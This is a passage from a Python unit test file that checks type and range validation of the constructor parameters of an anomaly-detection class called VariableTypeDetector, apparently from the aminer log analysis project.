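        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], None)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default")
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], True)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], 123)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.22)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config,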
[self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, 
VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/path"]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test="SomethingElse") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, used_gof_test=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test="KS") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test="CM") self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=0) VariableTypeDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, gof_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, s_gof_bt_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=["Default"]) 
self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=0) VariableTypeDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, d_bt_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
sim_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=set()) 
VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update=50) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, num_update_unq=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=0) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=101, num_init=100, num_update=50) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=49, num_init=100, num_update=50) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
num_s_gof_values="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=100, num_init=100, num_update=50) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=50, num_init=100, num_update=50) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=-1) 
self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=-1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, num_pause_others={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, test_gof_int=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=()) self.assertRaises(TypeError, VariableTypeDetector, 